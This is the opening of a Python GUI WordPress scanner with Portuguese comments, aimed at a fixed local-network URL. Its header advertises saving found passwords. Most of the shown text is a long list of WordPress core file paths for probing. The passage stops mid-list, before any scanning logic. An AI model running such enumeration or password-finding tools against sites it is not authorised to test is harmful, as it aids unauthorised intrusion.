#!/usr/bin/env python3
# WP-GUI-Scanner — Versão 2.6 (URL fixa + Salvar scan .txt + Salvar senhas .txt + Scrollbar)

import threading
import queue
import itertools
import os
import tkinter as tk
from tkinter import ttk, filedialog, messagebox
import requests
from bs4 import BeautifulSoup
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

UA = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) WP-GUI-Scanner/2.6"}

# URL fixa — altere aqui se precisar
URL_FIXA = "http://192.168.0.13/wordpress"

WORDPRESS_PATHS = [
    "wp-activate.php",
    "wp-includes/admin-bar.php",
    "wp-includes/revision.php",
    "wp-includes/template.php",
    "wp-includes/ms-functions.php",
    "wp-includes/class-wp-network-query.php",
    "wp-includes/class-feed.php",
    "wp-includes/class-wp-duotone.php",
    "wp-includes/widgets/class-wp-widget-links.php",
    "wp-includes/widgets/class-wp-widget-text.php",
    "wp-includes/widgets/class-wp-widget-media-image.php",
    "wp-includes/widgets/class-wp-widget-meta.php",
    "wp-includes/widgets/class-wp-widget-pages.php",
    "wp-includes/widgets/class-wp-widget-media-gallery.php",
    "wp-includes/widgets/class-wp-widget-media.php",
    "wp-includes/widgets/class-wp-widget-search.php",
    "wp-includes/widgets/class-wp-widget-calendar.php",
    "wp-includes/widgets/class-wp-widget-block.php",
    "wp-includes/widgets/class-wp-widget-media-audio.php",
    "wp-includes/widgets/class-wp-widget-tag-cloud.php",
    "wp-includes/widgets/class-wp-nav-menu-widget.php",
    "wp-includes/widgets/class-wp-widget-recent-posts.php",
    "wp-includes/widgets/class-wp-widget-recent-comments.php",
    "wp-includes/widgets/class-wp-widget-archives.php",
    "wp-includes/widgets/class-wp-widget-categories.php",
    "wp-includes/widgets/class-wp-widget-media-video.php",
    "wp-includes/widgets/class-wp-widget-rss.php",
    "wp-includes/widgets/class-wp-widget-custom-html.php",
    "wp-includes/shortcodes.php",
    "wp-includes/class-wp-block-parser-block.php",
    "wp-includes/locale.php",
    "wp-includes/feed-rss.php",
    "wp-includes/class-wp-block-editor-context.php",
    "wp-includes/class-wp-taxonomy.php",
    "wp-includes/class-wp-comment.php",
    "wp-includes/class-wp-recovery-mode-email-service.php",
    "wp-includes/class-wp-recovery-mode-key-service.php",
    "wp-includes/class-wp-theme-json-resolver.php",
    "wp-includes/script-loader.php",
    "wp-includes/certificates/ca-bundle.crt",
    "wp-includes/class-json.php",
    "wp-includes/sitemaps/class-wp-sitemaps-registry.php",
    "wp-includes/sitemaps/class-wp-sitemaps-index.php",
    "wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php",
    "wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php",
    "wp-includes/sitemaps/providers/class-wp-sitemaps-users.php",
    "wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php",
    "wp-includes/sitemaps/class-wp-sitemaps-provider.php",
    "wp-includes/sitemaps/class-wp-sitemaps-renderer.php",
    "wp-includes/sitemaps/class-wp-sitemaps.php",
    "wp-includes/functions.wp-scripts.php",
    "wp-includes/class-wp-image-editor-imagick.php",
    "wp-includes/class-avif-info.php",
    "wp-includes/class-wp-oembed-controller.php",
    "wp-includes/style-engine/class-wp-style-engine-css-declarations.php",
    "wp-includes/style-engine/class-wp-style-engine-css-rule.php",
    "wp-includes/style-engine/class-wp-style-engine.php",
    "wp-includes/style-engine/class-wp-style-engine-css-rules-store.php",
    "wp-includes/style-engine/class-wp-style-engine-processor.php",
    "wp-includes/customize/class-wp-customize-header-image-control.php",
    "wp-includes/customize/class-wp-customize-new-menu-section.php",
    "wp-includes/customize/class-wp-sidebar-block-editor-control.php",
    "wp-includes/customize/class-wp-customize-themes-section.php",
    "wp-includes/customize/class-wp-customize-partial.php",
    "wp-includes/customize/class-wp-customize-background-position-control.php",
    "wp-includes/customize/class-wp-widget-form-customize-control.php",
    "wp-includes/customize/class-wp-customize-filter-setting.php",
    "wp-includes/customize/class-wp-customize-media-control.php",
    "wp-includes/customize/class-wp-customize-background-image-setting.php",
    "wp-includes/customize/class-wp-customize-header-image-setting.php",
    "wp-includes/customize/class-wp-customize-color-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-item-setting.php",
    "wp-includes/customize/class-wp-customize-sidebar-section.php",
    "wp-includes/customize/class-wp-customize-selective-refresh.php",
    "wp-includes/customize/class-wp-customize-cropped-image-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-locations-control.php",
    "wp-includes/customize/class-wp-customize-date-time-control.php",
    "wp-includes/customize/class-wp-customize-code-editor-control.php",
    "wp-includes/customize/class-wp-widget-area-customize-control.php",
    "wp-includes/customize/class-wp-customize-nav-menus-panel.php",
    "wp-includes/customize/class-wp-customize-background-image-control.php",
    "wp-includes/customize/class-wp-customize-site-icon-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-section.php",
    "wp-includes/customize/class-wp-customize-theme-control.php",
    "wp-includes/customize/class-wp-customize-new-menu-control.php",
    "wp-includes/customize/class-wp-customize-custom-css-setting.php",
    "wp-includes/customize/class-wp-customize-nav-menu-name-control.php",
    "wp-includes/customize/class-wp-customize-themes-panel.php",
    "wp-includes/customize/class-wp-customize-image-control.php",
    "wp-includes/customize/class-wp-customize-upload-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-item-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-location-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-setting.php",
    "wp-includes/customize/class-wp-customize-nav-menu-control.php",
    "wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php",
    "wp-includes/kses.php",
    "wp-includes/class-wp-locale-switcher.php",
    "wp-includes/class-wp-block-templates-registry.php",
    "wp-includes/class-wp-recovery-mode-cookie-service.php",
    "wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor.php",
    "wp-includes/interactivity-api/class-wp-interactivity-api.php",
    "wp-includes/interactivity-api/interactivity-api.php",
    "wp-includes/class-wp-xmlrpc-server.php",
    "wp-includes/ms-settings.php",
    "wp-includes/block-template-utils.php",
    "wp-includes/class-wp-customize-control.php",
    "wp-includes/l10n.php",
    "wp-includes/bookmark.php",
    "wp-includes/fonts.php",
    "wp-includes/ms-default-filters.php",
    "wp-includes/class-wp-customize-section.php",
    "wp-includes/block-patterns/query-grid-posts.php",
    "wp-includes/block-patterns/query-offset-posts.php",
    "wp-includes/block-patterns/query-medium-posts.php",
    "wp-includes/block-patterns/query-standard-posts.php",
    "wp-includes/block-patterns/query-large-title-posts.php",
    "wp-includes/block-patterns/query-small-posts.php",
    "wp-includes/block-patterns/social-links-shared-background-color.php",
    "wp-includes/atomlib.php",
    "wp-includes/class-wp-script-modules.php",
    "wp-includes/class-wp-http-streams.php",
    "wp-includes/assets/script-loader-react-refresh-entry.php",
    "wp-includes/assets/script-modules-packages.min.php",
    "wp-includes/assets/script-loader-react-refresh-runtime.php",
    "wp-includes/assets/script-loader-packages.php",
    "wp-includes/assets/script-loader-packages.min.php",
    "wp-includes/assets/script-loader-react-refresh-runtime.min.php",
    "wp-includes/assets/script-modules-packages.php",
    "wp-includes/assets/script-loader-react-refresh-entry.min.php",
    "wp-includes/class-wp-date-query.php",
    "wp-includes/script-modules.php",
    "wp-includes/cron.php",
    "wp-includes/class-wp-embed.php",
    "wp-includes/vars.php",
    "wp-includes/feed-rss2.php",
    "wp-includes/class-wp-block-type-registry.php",
    "wp-includes/class-wp-user.php",
    "wp-includes/class.wp-dependencies.php",
    "wp-includes/ms-files.php",
    "wp-includes/class-snoopy.php",
    "wp-includes/class-wp-block.php",
    "wp-includes/class-wp-image-editor.php",
    "wp-includes/class-phpass.php",
    "wp-includes/http.php",
    "wp-includes/rss-functions.php",
    "wp-includes/class-wp-roles.php",
    "wp-includes/Requests/src/Port.php",
    "wp-includes/Requests/src/HookManager.php",
    "wp-includes/Requests/src/Response/Headers.php",
    "wp-includes/Requests/src/Iri.php",
    "wp-includes/Requests/src/Cookie.php",
    "wp-includes/Requests/src/Capability.php",
    "wp-includes/Requests/src/Proxy.php",
    "wp-includes/Requests/src/Hooks.php",
    "wp-includes/Requests/src/Auth/Basic.php",
    "wp-includes/Requests/src/Ssl.php",
    "wp-includes/Requests/src/Response.php",
    "wp-includes/Requests/src/Cookie/Jar.php",
    "wp-includes/Requests/src/Exception/Http.php",
    "wp-includes/Requests/src/Exception/InvalidArgument.php",
    "wp-includes/Requests/src/Exception/Transport.php",
    "wp-includes/Requests/src/Exception/Transport/Curl.php",
    "wp-includes/Requests/src/Exception/Http/Status304.php",
    "wp-includes/Requests/src/Exception/Http/Status418.php",
    "wp-includes/Requests/src/Exception/Http/Status417.php",
    "wp-includes/Requests/src/Exception/Http/Status409.php",
    "wp-includes/Requests/src/Exception/Http/Status429.php",
    "wp-includes/Requests/src/Exception/Http/Status501.php",
    "wp-includes/Requests/src/Exception/Http/Status408.php",
    "wp-includes/Requests/src/Exception/Http/Status407.php",
    "wp-includes/Requests/src/Exception/Http/Status400.php",
    "wp-includes/Requests/src/Exception/Http/Status306.php",
    "wp-includes/Requests/src/Exception/Http/Status412.php",
    "wp-includes/Requests/src/Exception/Http/Status502.php",
    "wp-includes/Requests/src/Exception/Http/Status411.php",
    "wp-includes/Requests/src/Exception/Http/StatusUnknown.php",
    "wp-includes/Requests/src/Exception/Http/Status500.php",
    "wp-includes/Requests/src/Exception/Http/Status415.php",
    "wp-includes/Requests/src/Exception/Http/Status406.php",
    "wp-includes/Requests/src/Exception/Http/Status403.php",
    "wp-includes/Requests/src/Exception/Http/Status401.php",
    "wp-includes/Requests/src/Exception/Http/Status404.php",
    "wp-includes/Requests/src/Exception/Http/Status428.php",
    "wp-includes/Requests/src/Exception/Http/Status305.php",
    "wp-includes/Requests/src/Exception/Http/Status402.php",
    "wp-includes/Requests/src/Exception/Http/Status503.php",
    "wp-includes/Requests/src/Exception/Http/Status414.php",
    "wp-includes/Requests/src/Exception/Http/Status431.php",
    "wp-includes/Requests/src/Exception/Http/Status413.php",
    "wp-includes/Requests/src/Exception/Http/Status505.php",
    "wp-includes/Requests/src/Exception/Http/Status511.php",
    "wp-includes/Requests/src/Exception/Http/Status410.php",
    "wp-includes/Requests/src/Exception/Http/Status416.php",
    "wp-includes/Requests/src/Exception/Http/Status504.php",
    "wp-includes/Requests/src/Exception/Http/Status405.php",
    "wp-includes/Requests/src/ArgumentCount.php",
    "wp-includes/Requests/src/Auth.php",
    "wp-includes/Requests/src/Transport.php",
    "wp-includes/Requests/src/Transport/Curl.php",
    "wp-includes/Requests/src/Transport/Fsockopen.php",
    "wp-includes/Requests/src/Proxy/Http.php",
    "wp-includes/Requests/src/Ipv6.php",
    "wp-includes/Requests/src/Requests.php",
    "wp-includes/Requests/src/Utility/FilteredIterator.php",
    "wp-includes/Requests/src/Utility/InputValidator.php",
    "wp-includes/Requests/src/Utility/CaseInsensitiveDictionary.php",
    "wp-includes/Requests/src/Session.php",
    "wp-includes/Requests/src/Exception.php",
    "wp-includes/Requests/src/IdnaEncoder.php",
    "wp-includes/Requests/src/Autoload.php",
    "wp-includes/Requests/library/Requests.php",
    "wp-includes/class-wp-http-proxy.php",
    "wp-includes/class-smtp.php",
    "wp-includes/class-wp-customize-panel.php",
    "wp-includes/comment-template.php",
    "wp-includes/rest-api/search/class-wp-rest-post-search-handler.php",
    "wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php",
    "wp-includes/rest-api/search/class-wp-rest-search-handler.php",
    "wp-includes/rest-api/search/class-wp-rest-term-search-handler.php",
    "wp-includes/rest-api/class-wp-rest-server.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-font-faces-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-font-collections-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php",
    "wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php",
    "wp-includes/rest-api/class-wp-rest-response.php",
    "wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php",
    "wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php",
    "wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php",
    "wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php",
    "wp-includes/rest-api/fields/class-wp-rest-meta-fields.php",
    "wp-includes/rest-api/class-wp-rest-request.php",
    "wp-includes/class-wp-block-bindings-source.php",
    "wp-includes/class-wp-theme.php",
    "wp-includes/class-wp-http-response.php",
    "wp-includes/class-wp-http.php",
    "wp-includes/update.php",
    "wp-includes/class-wp-query.php",
    "wp-includes/class-wp-widget-factory.php",
    "wp-includes/class-wp-block-pattern-categories-registry.php",
    "wp-includes/ID3/module.tag.apetag.php",
    "wp-includes/ID3/readme.txt",
    "wp-includes/ID3/module.audio-video.riff.php",
    "wp-includes/ID3/module.tag.lyrics3.php",
    "wp-includes/ID3/module.audio.ogg.php",
    "wp-includes/ID3/module.audio.dts.php",
    "wp-includes/ID3/module.tag.id3v1.php",
    "wp-includes/ID3/license.txt",
    "wp-includes/ID3/module.audio.ac3.php",
    "wp-includes/ID3/module.audio.flac.php",
    "wp-includes/ID3/module.audio-video.flv.php",
    "wp-includes/ID3/getid3.lib.php",
    "wp-includes/ID3/module.audio.mp3.php",
    "wp-includes/ID3/module.audio-video.asf.php",
    "wp-includes/ID3/getid3.php",
    "wp-includes/ID3/module.audio-video.matroska.php",
    "wp-includes/ID3/module.tag.id3v2.php",
    "wp-includes/ID3/module.audio-video.quicktime.php",
    "wp-includes/default-filters.php",
    "wp-includes/global-styles-and-settings.php",
    "wp-includes/ms-network.php",
    "wp-includes/class-wp-user-request.php",
    "wp-includes/plugin.php",
    "wp-includes/blocks.php",
    "wp-includes/sitemaps.php",
    "wp-includes/block-template.php",
    "wp-includes/class-wp-user-query.php",
    "wp-includes/meta.php",
    "wp-includes/template-canvas.php",
    "wp-includes/class-wp-dependency.php",
    "wp-includes/images/media/interactive.svg",
    "wp-includes/images/media/code.svg",
    "wp-includes/images/media/video.svg",
    "wp-includes/images/media/archive.svg",
    "wp-includes/images/media/audio.svg",
    "wp-includes/images/media/document.svg",
    "wp-includes/images/media/default.svg",
    "wp-includes/images/media/spreadsheet.svg",
    "wp-includes/images/media/text.svg",
    "wp-includes/images/crystal/license.txt",
    "wp-includes/class-wp-http-cookie.php",
    "wp-includes/author-template.php",
    "wp-includes/class-wp-token-map.php",
    "wp-includes/class-wp-fatal-error-handler.php",
    "wp-includes/robots-template.php",
    "wp-includes/wp-diff.php",
    "wp-includes/media-template.php",
    "wp-includes/feed-rdf.php",
    "wp-includes/user.php",
    "wp-includes/registration-functions.php",
    "wp-includes/class-wp-http-encoding.php",
    "wp-includes/wp-db.php",
    "wp-includes/feed.php",
    "wp-includes/feed-atom.php",
    "wp-includes/class-requests.php",
    "wp-includes/default-constants.php",
    "wp-includes/class-wp-block-template.php",
    "wp-includes/class-walker-page-dropdown.php",
    "wp-includes/feed-rss2-comments.php",
    "wp-includes/class-wp-hook.php",
    "wp-includes/class-wp-http-requests-hooks.php",
    "wp-includes/formatting.php",
    "wp-includes/functions.php",
    "wp-includes/class-http.php",
    "wp-includes/query.php",
    "wp-includes/class-wp-textdomain-registry.php",
    "wp-includes/compat.php",
    "wp-includes/ms-deprecated.php",
    "wp-includes/class-wp-feed-cache-transient.php",
    "wp-includes/embed.php",
    "wp-includes/html-api/class-wp-html-processor-state.php",
    "wp-includes/html-api/class-wp-html-doctype-info.php",
    "wp-includes/html-api/class-wp-html-open-elements.php",
    "wp-includes/html-api/class-wp-html-stack-event.php",
    "wp-includes/html-api/class-wp-html-tag-processor.php",
    "wp-includes/html-api/class-wp-html-span.php",
    "wp-includes/html-api/html5-named-character-references.php",
    "wp-includes/html-api/class-wp-html-text-replacement.php",
    "wp-includes/html-api/class-wp-html-processor.php",
    "wp-includes/html-api/class-wp-html-attribute-token.php",
    "wp-includes/html-api/class-wp-html-decoder.php",
    "wp-includes/html-api/class-wp-html-active-formatting-elements.php",
    "wp-includes/html-api/class-wp-html-unsupported-exception.php",
    "wp-includes/html-api/class-wp-html-token.php",
    "wp-includes/ms-site.php",
    "wp-includes/class-wp-session-tokens.php",
    "wp-includes/js/wplink.js",
    "wp-includes/js/wp-util.min.js",
    "wp-includes/js/shortcode.min.js",
    "wp-includes/js/swfupload/license.txt",
    "wp-includes/js/swfupload/handlers.js",
    "wp-includes/js/swfupload/handlers.min.js",
    "wp-includes/js/swfupload/swfupload.js",
    "wp-includes/js/mediaelement/renderers/vimeo.min.js",
    "wp-includes/js/mediaelement/renderers/vimeo.js",
    "wp-includes/js/mediaelement/mediaelement-migrate.min.js",
    "wp-includes/js/mediaelement/mediaelement-migrate.js",
    "wp-includes/js/mediaelement/wp-mediaelement.min.js",
    "wp-includes/js/mediaelement/mediaelement-and-player.js",
    "wp-includes/js/mediaelement/mediaelement.min.js",
    "wp-includes/js/mediaelement/wp-mediaelement.js",
    "wp-includes/js/mediaelement/wp-playlist.min.js",
    "wp-includes/js/mediaelement/mediaelement-and-player.min.js",
    "wp-includes/js/mediaelement/mejs-controls.svg",
    "wp-includes/js/mediaelement/wp-playlist.js",
    "wp-includes/js/mediaelement/mediaelement.js",
    "wp-includes/js/masonry.min.js",
    "wp-includes/js/wp-emoji.js",
    "wp-includes/js/media-editor.js",
    "wp-includes/js/customize-selective-refresh.js",
    "wp-includes/js/customize-preview-widgets.min.js",
    "wp-includes/js/customize-views.min.js",
    "wp-includes/js/wp-embed-template.js",
    "wp-includes/js/twemoji.js",
    "wp-includes/js/customize-base.js",
    "wp-includes/js/admin-bar.js",
    "wp-includes/js/media-grid.js",
    "wp-includes/js/swfobject.js",
    "wp-includes/js/customize-models.min.js",
    "wp-includes/js/wp-sanitize.js",
    "wp-includes/js/media-views.min.js",
    "wp-includes/js/mce-view.min.js",
    "wp-includes/js/shortcode.js",
    "wp-includes/js/autosave.js",
    "wp-includes/js/wp-api.min.js",
    "wp-includes/js/media-views.js",
    "wp-includes/js/wp-util.js",
    "wp-includes/js/media-models.js",
    "wp-includes/js/customize-base.min.js",
    "wp-includes/js/comment-reply.js",
    "wp-includes/js/customize-preview-nav-menus.min.js",
    "wp-includes/js/wpdialog.js",
    "wp-includes/js/wp-custom-header.js",
    "wp-includes/js/wp-ajax-response.js",
    "wp-includes/js/wp-embed.min.js",
    "wp-includes/js/heartbeat.js",
    "wp-includes/js/hoverintent-js.min.js",
    "wp-includes/js/zxcvbn.min.js",
    "wp-includes/js/twemoji.min.js",
    "wp-includes/js/quicktags.js",
    "wp-includes/js/hoverIntent.min.js",
    "wp-includes/js/utils.min.js",
    "wp-includes/js/jcrop/jquery.Jcrop.min.js",
    "wp-includes/js/customize-views.js",
    "wp-includes/js/media-models.min.js",
    "wp-includes/js/zxcvbn-async.min.js",
    "wp-includes/js/media-grid.min.js",
    "wp-includes/js/plupload/wp-plupload.js",
    "wp-includes/js/plupload/plupload.min.js",
    "wp-includes/js/plupload/license.txt",
    "wp-includes/js/plupload/moxie.js",
    "wp-includes/js/plupload/wp-plupload.min.js",
    "wp-includes/js/plupload/handlers.js",
    "wp-includes/js/plupload/plupload.js",
    "wp-includes/js/plupload/handlers.min.js",
    "wp-includes/js/plupload/moxie.min.js",
    "wp-includes/js/backbone.min.js",
    "wp-includes/js/thickbox/thickbox.js",
    "wp-includes/js/quicktags.min.js",
    "wp-includes/js/wpdialog.min.js",
    "wp-includes/js/codemirror/esprima.js",
    "wp-includes/js/codemirror/jsonlint.js",
    "wp-includes/js/codemirror/fakejshint.js",
    "wp-includes/js/codemirror/codemirror.min.js",
    "wp-includes/js/codemirror/htmlhint-kses.js",
    "wp-includes/js/codemirror/htmlhint.js",
    "wp-includes/js/codemirror/csslint.js",
    "wp-includes/js/customize-loader.min.js",
    "wp-includes/js/json2.js",
    "wp-includes/js/comment-reply.min.js",
    "wp-includes/js/underscore.js",
    "wp-includes/js/wp-pointer.js",
    "wp-includes/js/wp-api.js",
    "wp-includes/js/wp-pointer.min.js",
    "wp-includes/js/imagesloaded.min.js",
    "wp-includes/js/wp-backbone.js",
    "wp-includes/js/underscore.min.js",
    "wp-includes/js/clipboard.js",
    "wp-includes/js/autosave.min.js",
    "wp-includes/js/clipboard.min.js",
    "wp-includes/js/wp-auth-check.min.js",
    "wp-includes/js/heartbeat.min.js",
    "wp-includes/js/api-request.min.js",
    "wp-includes/js/wp-list-revisions.js",
    "wp-includes/js/api-request.js",
    "wp-includes/js/media-editor.min.js",
    "wp-includes/js/mce-view.js",
    "wp-includes/js/wp-sanitize.min.js",
    "wp-includes/js/jquery/ui/effect-transfer.min.js",
    "wp-includes/js/jquery/ui/effect-drop.js",
    "wp-includes/js/jquery/ui/tooltip.min.js",
    "wp-includes/js/jquery/ui/selectable.min.js",
    "wp-includes/js/jquery/ui/spinner.min.js",
    "wp-includes/js/jquery/ui/effect-fold.min.js",
    "wp-includes/js/jquery/ui/accordion.js",
    "wp-includes/js/jquery/ui/effect-pulsate.js",
    "wp-includes/js/jquery/ui/tooltip.js",
    "wp-includes/js/jquery/ui/effect-highlight.js",
    "wp-includes/js/jquery/ui/effect.min.js",
    "wp-includes/js/jquery/ui/checkboxradio.js",
    "wp-includes/js/jquery/ui/checkboxradio.min.js",
    "wp-includes/js/jquery/ui/effect-puff.js",
    "wp-includes/js/jquery/ui/effect-transfer.js",
    "wp-includes/js/jquery/ui/autocomplete.min.js",
    "wp-includes/js/jquery/ui/controlgroup.min.js",
    "wp-includes/js/jquery/ui/effect-bounce.js",
    "wp-includes/js/jquery/ui/mouse.min.js",
    "wp-includes/js/jquery/ui/effect-pulsate.min.js",
    "wp-includes/js/jquery/ui/sortable.js",
    "wp-includes/js/jquery/ui/dialog.min.js",
    "wp-includes/js/jquery/ui/menu.min.js",
    "wp-includes/js/jquery/ui/button.js",
    "wp-includes/js/jquery/ui/effect-highlight.min.js",
    "wp-includes/js/jquery/ui/draggable.min.js",
    "wp-includes/js/jquery/ui/effect-size.min.js",
    "wp-includes/js/jquery/ui/selectmenu.min.js",
    "wp-includes/js/jquery/ui/effect-explode.min.js",
    "wp-includes/js/jquery/ui/slider.js",
    "wp-includes/js/jquery/ui/effect-explode.js",
    "wp-includes/js/jquery/ui/resizable.js",
    "wp-includes/js/jquery/ui/progressbar.min.js",
    "wp-includes/js/jquery/ui/effect-shake.js",
    "wp-includes/js/jquery/ui/sortable.min.js",
    "wp-includes/js/jquery/ui/effect-bounce.min.js",
    "wp-includes/js/jquery/ui/effect-clip.js",
    "wp-includes/js/jquery/ui/dialog.js",
    "wp-includes/js/jquery/ui/accordion.min.js",
    "wp-includes/js/jquery/ui/button.min.js",
    "wp-includes/js/jquery/ui/effect-fade.js",
    "wp-includes/js/jquery/ui/menu.js",
    "wp-includes/js/jquery/ui/tabs.min.js",
    "wp-includes/js/jquery/ui/core.js",
    "wp-includes/js/jquery/ui/datepicker.js",
    "wp-includes/js/jquery/ui/effect-slide.js",
    "wp-includes/js/jquery/ui/droppable.min.js",
    "wp-includes/js/jquery/ui/effect-blind.js",
    "wp-includes/js/jquery/ui/effect.js",
    "wp-includes/js/jquery/ui/effect-puff.min.js",
    "wp-includes/js/jquery/ui/resizable.min.js",
    "wp-includes/js/jquery/ui/selectmenu.js",
    "wp-includes/js/jquery/ui/effect-drop.min.js",
    "wp-includes/js/jquery/ui/effect-shake.min.js",
    "wp-includes/js/jquery/ui/core.min.js",
    "wp-includes/js/jquery/ui/progressbar.js",
    "wp-includes/js/jquery/ui/effect-slide.min.js",
    "wp-includes/js/jquery/ui/effect-fade.min.js",
    "wp-includes/js/jquery/ui/selectable.js",
    "wp-includes/js/jquery/ui/spinner.js",
    "wp-includes/js/jquery/ui/mouse.js",
    "wp-includes/js/jquery/ui/effect-clip.min.js",
    "wp-includes/js/jquery/ui/effect-scale.js",
    "wp-includes/js/jquery/ui/autocomplete.js",
    "wp-includes/js/jquery/ui/datepicker.min.js",
    "wp-includes/js/jquery/ui/droppable.js",
    "wp-includes/js/jquery/ui/tabs.js",
    "wp-includes/js/jquery/ui/effect-blind.min.js",
    "wp-includes/js/jquery/ui/draggable.js",
    "wp-includes/js/jquery/ui/effect-scale.min.js",
    "wp-includes/js/jquery/ui/effect-size.js",
    "wp-includes/js/jquery/ui/slider.min.js",
    "wp-includes/js/jquery/ui/effect-fold.js",
    "wp-includes/js/jquery/ui/controlgroup.js",
    "wp-includes/js/jquery/jquery.hotkeys.min.js",
    "wp-includes/js/jquery/suggest.min.js",
    "wp-includes/js/jquery/jquery.serialize-object.js",
    "wp-includes/js/jquery/suggest.js",
    "wp-includes/js/jquery/jquery.js",
    "wp-includes/js/jquery/jquery.masonry.min.js",
    "wp-includes/js/jquery/jquery.query.js",
    "wp-includes/js/jquery/jquery.schedule.js",
    "wp-includes/js/jquery/jquery.form.min.js",
    "wp-includes/js/jquery/jquery-migrate.js",
    "wp-includes/js/jquery/jquery.ui.touch-punch.js",
    "wp-includes/js/jquery/jquery.table-hotkeys.min.js",
    "wp-includes/js/jquery/jquery.min.js",
    "wp-includes/js/jquery/jquery.table-hotkeys.js",
    "wp-includes/js/jquery/jquery-migrate.min.js",
    "wp-includes/js/jquery/jquery.form.js",
    "wp-includes/js/jquery/jquery.color.min.js",
    "wp-includes/js/jquery/jquery.hotkeys.js",
    "wp-includes/js/colorpicker.js",
    "wp-includes/js/customize-preview-widgets.js",
    "wp-includes/js/wp-embed.js",
    "wp-includes/js/wp-custom-header.min.js",
    "wp-includes/js/imgareaselect/jquery.imgareaselect.min.js",
    "wp-includes/js/imgareaselect/jquery.imgareaselect.js",
    "wp-includes/js/hoverIntent.js",
    "wp-includes/js/json2.min.js",
    "wp-includes/js/wp-backbone.min.js",
    "wp-includes/js/colorpicker.min.js",
    "wp-includes/js/customize-models.js",
    "wp-includes/js/media-audiovideo.min.js",
    "wp-includes/js/tw-sack.js",
    "wp-includes/js/dist/editor.js",
    "wp-includes/js/dist/customize-widgets.js",
    "wp-includes/js/dist/core-commands.min.js",
    "wp-includes/js/dist/shortcode.min.js",
    "wp-includes/js/dist/components.min.js",
    "wp-includes/js/dist/patterns.js",
    "wp-includes/js/dist/patterns.min.js",
    "wp-includes/js/dist/redux-routine.min.js",
    "wp-includes/js/dist/hooks.min.js",
    "wp-includes/js/dist/edit-widgets.js",
    "wp-includes/js/dist/rich-text.js",
    "wp-includes/js/dist/vendor/react-jsx-runtime.js",
    "wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js",
    "wp-includes/js/dist/vendor/moment.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-object-fit.js",
    "wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js",
    "wp-includes/js/dist/vendor/lodash.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-formdata.js",
    "wp-includes/js/dist/vendor/wp-polyfill-url.min.js",
    "wp-includes/js/dist/vendor/moment.js",
    "wp-includes/js/dist/vendor/wp-polyfill.js",
    "wp-includes/js/dist/vendor/wp-polyfill-url.js",
    "wp-includes/js/dist/vendor/react.min.js",
